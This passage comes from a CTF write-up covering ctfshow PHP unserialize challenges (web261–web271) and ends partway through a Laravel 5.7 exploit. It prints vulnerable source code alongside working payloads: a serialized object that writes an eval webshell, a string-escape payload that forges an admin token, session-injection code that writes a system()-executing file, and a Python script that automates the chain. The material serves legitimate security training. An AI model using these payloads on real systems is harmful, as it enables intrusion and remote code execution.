__wakeup() is ignored.</p><p>So the following check is nothing to worry about:</p><figure class="highlight 
plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">public function __wakeup(){</span><br><span class="line">if($this->username!='' || $this->password!=''){</span><br><span class="line">die('error');</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>$this->code==0x36d is a loose comparison. code is username concatenated with password, and the comparison only takes its leading numeric part; 0x36d in decimal is 877.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">class ctfshowvip{</span><br><span class="line">public $username = "877.php";</span><br><span class="line">public $password = '<?php @eval($_GET[1]);?>';</span><br><span class="line">}</span><br><span class="line">$a = new ctfshowvip();</span><br><span class="line">echo urlencode(serialize($a));</span><br><span class="line">?></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O%3A10%3A%22ctfshowvip%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+%40eval%28%24_GET%5B1%5D%29%3B%3F%3E%22%3B%7D</span><br></pre></td></tr></table></figure><p>After running it, request the written webshell; the flag is in /flag_is_here.</p><h1 id="WEB262"><a href="#WEB262" class="headerlink" title="WEB262"></a>WEB262</h1><figure 
class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*</span><br><span class="line"># @Author: h1xa</span><br><span class="line"># @Date: 2020-12-03 02:37:19</span><br><span class="line"># @Last Modified by: h1xa</span><br><span class="line"># @Last Modified time: 2020-12-03 16:05:38</span><br><span class="line"># @message.php</span><br><span class="line"># @email: h1xa@ctfer.com</span><br><span class="line"># @link: https://ctfer.com</span><br><span class="line">*/</span><br><span class="line">error_reporting(0);</span><br><span class="line">class message{</span><br><span class="line">public $from;</span><br><span class="line">public $msg;</span><br><span class="line">public $to;</span><br><span class="line">public $token='user';</span><br><span class="line">public function 
__construct($f,$m,$t){</span><br><span class="line">$this->from = $f;</span><br><span class="line">$this->msg = $m;</span><br><span class="line">$this->to = $t;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line">$f = $_GET['f'];</span><br><span class="line">$m = $_GET['m'];</span><br><span class="line">$t = $_GET['t'];</span><br><span class="line">if(isset($f) && isset($m) && isset($t)){</span><br><span class="line">$msg = new message($f,$m,$t);</span><br><span class="line">$umsg = str_replace('fuck', 'loveU', serialize($msg));</span><br><span class="line">setcookie('msg',base64_encode($umsg));</span><br><span class="line">echo 'Your message has been sent';</span><br><span class="line">}</span><br><span class="line">highlight_file(__FILE__);</span><br></pre></td></tr></table></figure><p>The comment header mentions message.php:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span 
class="title">message</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">'user'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="keyword">from</span> = <span class="variable">$f</span>;</span><br><span class="line"><span class="variable language_">$this</span>->msg = <span class="variable">$m</span>;</span><br><span class="line"><span class="variable language_">$this</span>->to = <span class="variable">$t</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">'msg'</span>])){</span><br><span class="line"><span class="variable">$msg</span> = <span class="title function_ invoke__">unserialize</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$_COOKIE</span>[<span class="string">'msg'</span>]));</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$msg</span>->token==<span class="string">'admin'</span>){</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">}</span><br><span 
class="line">}</span><br></pre></td></tr></table></figure><p>If user can be turned into admin, the flag is returned.</p><p>Topic: deserialization string escape</p><p>First, look at a piece of code:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">test</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span> = <span class="string">"user"</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$password</span> = <span class="string">"user"</span>;</span><br><span class="line">}</span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> <span class="title function_ invoke__">test</span>();</span><br><span class="line"><span class="variable">$b</span> = <span class="title function_ invoke__">serialize</span>(<span class="variable">$a</span>);</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="variable">$b</span>);</span><br></pre></td></tr></table></figure><p>Running it gives</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">string(67) "O:4:"test":2:{s:8:"username";s:4:"user";s:8:"password";s:4:"user";}"</span><br></pre></td></tr></table></figure><p>Now craft the contents of user:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">"O:4:"test":2:{s:8:"username";s:4:"user";s:8:"password";s:4:"hack";}user";}"</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$a = 'O:4:"test":2:{s:8:"username";s:4:"user";s:8:"password";s:4:"hack";}user";}';</span><br><span class="line">var_dump(unserialize($a));</span><br></pre></td></tr></table></figure><p>Output:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">object(__PHP_Incomplete_Class)#1 (3) {</span><br><span class="line">["__PHP_Incomplete_Class_Name"]=></span><br><span class="line">string(4) "test"</span><br><span class="line">["username"]=></span><br><span class="line">string(4) "user"</span><br><span class="line">["password"]=></span><br><span class="line">string(4) "hack"</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Notice that the earlier user / user has become user / hack: unserialize stops at the first closing brace and ignores whatever trails it.</p><p>Back to the challenge: fuck is replaced with loveU, so every 4-character unit we control becomes 5 characters, while the s:N length declared before it was computed for the original 4.</p><p>What needs to be constructed is</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">";s:5:"token";s:5:"admin";}</span><br></pre></td></tr></table></figure><p>which is 27 characters,</p><p>so 27 fucks are needed to obtain the extra controllable positions.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f=123&m=123&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}</span><br></pre></td></tr></table></figure><p>Then visit /message.php.</p><h1 id="web263"><a href="#web263" class="headerlink" title="web263"></a>web263</h1><p>A login page; the source:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params"></span>)</span>{</span><br><span class="line">$.<span class="title function_ invoke__">ajax</span>({</span><br><span class="line"><span class="attr">url</span>:<span class="string">'check.php'</span>,</span><br><span class="line"><span class="attr">type</span>: <span class="string">'GET'</span>,</span><br><span class="line"><span class="attr">data</span>:{</span><br><span class="line"><span class="string">'u'</span>:$(<span class="string">'#u'</span>).<span class="title function_ invoke__">val</span>(),</span><br><span class="line"><span class="string">'pass'</span>:$(<span class="string">'#pass'</span>).<span class="title function_ invoke__">val</span>()</span><br><span class="line">},</span><br><span class="line">success:<span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</span><br><span class="line"><span class="title function_ 
invoke__">alert</span>(JSON.<span class="title function_ invoke__">parse</span>(data).msg);</span><br><span class="line">},</span><br><span class="line">error:<span class="function"><span class="keyword">function</span>(<span class="params">data</span>)</span>{</span><br><span class="line"><span class="title function_ invoke__">alert</span>(JSON.<span class="title function_ invoke__">parse</span>(data).msg);</span><br><span class="line">}</span><br><span class="line">});</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>www.zip is exposed; download the source code.</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="comment">#index.php</span></span><br><span class="line">关键代码</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">'limit'</span>])){</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'limti'</span>]><span class="number">5</span>?<span class="keyword">die</span>(<span class="string">"</span></span><br><span class="line"><span class="string">登陆失败次数超过限制</span></span><br><span class="line"><span class="string">"</span>):<span class="variable">$_SESSION</span>[<span class="string">'limit'</span>]=base6</span><br><span class="line"><span class="number">4</span>_decode(<span class="variable">$_COOKIE</span>[<span class="string">'limit'</span>]);</span><br><span class="line"><span class="variable">$_COOKIE</span>[<span class="string">'limit'</span>] = <span class="title function_ invoke__">base64_encode</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$_COOKIE</span>[<span class="string">'limit'</span>]) +<span class="number">1</span>)</span><br><span class="line">;</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"><span class="title function_ invoke__">setcookie</span>(<span class="string">"limit"</span>,<span class="title function_ invoke__">base64_encode</span>(<span class="string">'1'</span>));</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'limit'</span>]= <span class="number">1</span>;</span><br><span class="line">}</span><br><span class="line"><span class="comment">#inc.php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$username</span>;</span><br><span class="line"><span class="keyword">public</span> <span 
class="variable">$password</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$status</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$username</span>,<span class="variable">$password</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->username = <span class="variable">$username</span>;</span><br><span class="line"><span class="variable language_">$this</span>->password = <span class="variable">$password</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">setStatus</span>(<span class="params"><span class="variable">$s</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>->status=<span class="variable">$s</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>{</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">"log-"</span>.<span class="variable">$this</span>->username, <span class="string">"</span></span><br><span class="line"><span class="string">使⽤</span></span><br><span class="line"><span class="string">"</span>.<span class="variable">$this</span>->password.</span><br><span class="line"><span class="string">"</span></span><br><span class="line"><span class="string">登陆</span></span><br><span class="line"><span class="string">"</span>.(<span class="variable">$this</span>->status?<span class="string">"</span></span><br><span class="line"><span class="string">成功</span></span><br><span class="line"><span class="string">"</span>:<span class="string">"</span></span><br><span class="line"><span 
class="string">失败</span></span><br><span class="line"><span class="string">"</span>).<span class="string">"----"</span>.<span class="title function_ invoke__">date_create</span>()-><span class="title function_ invoke__">format</span>(<span class="string">'Y-m-d H:</span></span><br><span class="line"><span class="string">i:s'</span>));</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>cookie 中的 limit 进⾏base64解码之后传⼊session中,之后调⽤ inc 中的 User 类,并且其中这个 User 类中存在⽂件写⼊函数,所以写⼊⼀句话</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">class User{</span><br><span class="line">public $username = 'ma.php';</span><br><span class="line">public $password = '<?php system("tac flag.php");?>';</span><br><span class="line">public $status='ma';</span><br><span class="line">}</span><br><span class="line">$a=new User();</span><br><span class="line">echo base64_encode('|'.serialize($a));</span><br><span class="line">?></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo2OiJtYS5waHAiO3M6ODoicGFzc3dvcmQ</span><br><span class="line">iO3M6MzE6Ijw/cGhwIHN5c3RlbSgidGFjIGZsYWcucGhwIik7Pz4iO3M6Njoic3RhdHVzIjtzOj</span><br><span class="line">I6Im1hIjt9</span><br></pre></td></tr></table></figure><p>带着cookie去访 index.php ,接着访问 inc/inc.php ,然后就会⽣成⽂件 log-ma.php</p><p>于是写脚本</p><figure class="highlight 
python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">"url"</span></span><br><span class="line"><span class="comment"># limit is the base64 payload generated above; PHPSESSID is the session it lands in</span></span><br><span class="line">cookies = {<span class="string">"PHPSESSID"</span>: <span class="string">"a1keltr210l16p88sqdrrqrprj"</span>, <span class="string">"limit"</span>: <span class="string">"fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo2OiJtYS5waHAiO3M6ODoicGFzc3dvcmQiO3M6MzE6Ijw/cGhwIHN5c3RlbSgidGFjIGZsYWcucGhwIik7Pz4iO3M6Njoic3RhdHVzIjtzOjI6Im1hIjt9"</span>}</span><br><span class="line"><span class="comment"># index.php decodes the cookie into $_SESSION['limit']</span></span><br><span class="line">res1 = requests.get(url + <span class="string">"index.php"</span>, cookies=cookies)</span><br><span class="line"><span class="comment"># inc/inc.php defines User, so the session object is rebuilt and __destruct writes log-ma.php</span></span><br><span class="line">res2 = requests.get(url + <span class="string">"inc/inc.php"</span>, cookies=cookies)</span><br><span class="line">res3 = requests.get(url + <span class="string">"log-ma.php"</span>, cookies=cookies)</span><br><span class="line"><span class="built_in">print</span>(res3.text)</span><br></pre></td></tr></table></figure><h1 id="web264"><a href="#web264" class="headerlink" title="web264"></a>web264</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">'user'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="keyword">from</span> = <span class="variable">$f</span>;</span><br><span class="line"><span class="variable language_">$this</span>->msg = <span class="variable">$m</span>;</span><br><span class="line"><span class="variable language_">$this</span>->to = <span class="variable">$t</span>;</span><br><span class="line">}</span><br><span 
class="line">}</span><br><span class="line"><span class="variable">$f</span> = <span class="variable">$_GET</span>[<span class="string">'f'</span>];</span><br><span class="line"><span class="variable">$m</span> = <span class="variable">$_GET</span>[<span class="string">'m'</span>];</span><br><span class="line"><span class="variable">$t</span> = <span class="variable">$_GET</span>[<span class="string">'t'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$f</span>) && <span class="keyword">isset</span>(<span class="variable">$m</span>) && <span class="keyword">isset</span>(<span class="variable">$t</span>)){</span><br><span class="line"><span class="variable">$msg</span> = <span class="keyword">new</span> <span class="title function_ invoke__">message</span>(<span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span>);</span><br><span class="line"><span class="variable">$umsg</span> = <span class="title function_ invoke__">str_replace</span>(<span class="string">'fuck'</span>, <span class="string">'loveU'</span>, <span class="title function_ invoke__">serialize</span>(<span class="variable">$msg</span>));</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'msg'</span>]=<span class="title function_ invoke__">base64_encode</span>(<span class="variable">$umsg</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="string">'Your message has been sent'</span>;</span><br><span class="line">}</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure><p>message.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">'flag.php'</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">message</span></span>{</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$from</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$msg</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$to</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="variable">$token</span>=<span class="string">'user'</span>;</span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$f</span>,<span class="variable">$m</span>,<span class="variable">$t</span></span>)</span>{</span><br><span class="line"><span class="variable language_">$this</span>-><span class="keyword">from</span> = <span class="variable">$f</span>;</span><br><span class="line"><span 
class="variable language_">$this</span>->msg = <span class="variable">$m</span>;</span><br><span class="line"><span class="variable language_">$this</span>->to = <span class="variable">$t</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">'msg'</span>])){</span><br><span class="line"><span class="variable">$msg</span> = <span class="title function_ invoke__">unserialize</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$_SESSION</span>[<span class="string">'msg'</span>]));</span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$msg</span>->token==<span class="string">'admin'</span>){</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$flag</span>;</span><br><span class="line">}</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Looking at it, compared with web262 the only difference is the session_start() added at the top of message.php, so we attack with the previous payload; the one catch is that a msg cookie must carry a value when visiting message.php, since the check is isset($_COOKIE['msg']) while the data itself comes from $_SESSION['msg'].</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20260104225621086.png" alt="image-20260104225621086"></p><h1 id="web271"><a href="#web271" class="headerlink" title="web271"></a>web271</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span 
class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Laravel - A PHP Framework For Web Artisans</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@package</span> Laravel</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@author</span> Taylor Otwell <taylor<span class="doctag">@laravel</span>.com></span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="title function_ invoke__">define</span>(<span class="string">'LARAVEL_START'</span>, <span class="title function_ invoke__">microtime</span>(<span class="literal">true</span>));</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span 
class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">| Register The Auto Loader</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">| Composer provides a convenient, automatically generated class loader for</span></span><br><span class="line"><span class="comment">| our application. We just need to utilize it! We'll simply require it</span></span><br><span class="line"><span class="comment">| into the script here so that we don't have to worry about manual</span></span><br><span class="line"><span class="comment">| loading any of our classes later on. It feels great to relax.</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="keyword">require</span> <span class="keyword">__DIR__</span> . 
<span class="string">'/../vendor/autoload.php'</span>;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">| Turn On The Lights</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">| We need to illuminate PHP development, so let us turn on the lights.</span></span><br><span class="line"><span class="comment">| This bootstraps the framework and gets it ready for use, then it</span></span><br><span class="line"><span class="comment">| will load up this application so that we can run it and send</span></span><br><span class="line"><span class="comment">| the responses back to the browser and delight our users.</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="variable">$app</span> = <span class="keyword">require_once</span> <span class="keyword">__DIR__</span> . 
<span class="string">'/../bootstrap/app.php'</span>;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">| Run The Application</span></span><br><span class="line"><span class="comment">|--------------------------------------------------------------------------</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">| Once we have the application, we can handle the incoming request</span></span><br><span class="line"><span class="comment">| through the kernel, and send the associated response back to</span></span><br><span class="line"><span class="comment">| the client's browser allowing them to enjoy the creative</span></span><br><span class="line"><span class="comment">| and wonderful application we have prepared for them.</span></span><br><span class="line"><span class="comment">|</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="variable">$kernel</span> = <span class="variable">$app</span>-><span class="title function_ invoke__">make</span>(<span class="title class_">Illuminate\Contracts\Http\Kernel</span>::<span class="variable language_">class</span>);</span><br><span class="line"><span class="variable">$response</span> = <span class="variable">$kernel</span>-><span class="title function_ invoke__">handle</span>(</span><br><span class="line"><span class="variable">$request</span> = <span class="title class_">Illuminate\Http\Request</span>::<span class="title function_ invoke__">capture</span>()</span><br><span class="line">);</span><br><span class="line">@<span class="title function_ invoke__">unserialize</span>(<span class="variable">$_POST</span>[<span class="string">'data'</span>]);</span><br><span class="line"><span class="title function_ 
invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="variable">$kernel</span>-><span class="title function_ invoke__">terminate</span>(<span class="variable">$request</span>, <span class="variable">$response</span>);</span><br></pre></td></tr></table></figure><p>This one tests the Laravel 5.7 deserialization vulnerability: index.php above passes POST data straight to unserialize().</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span 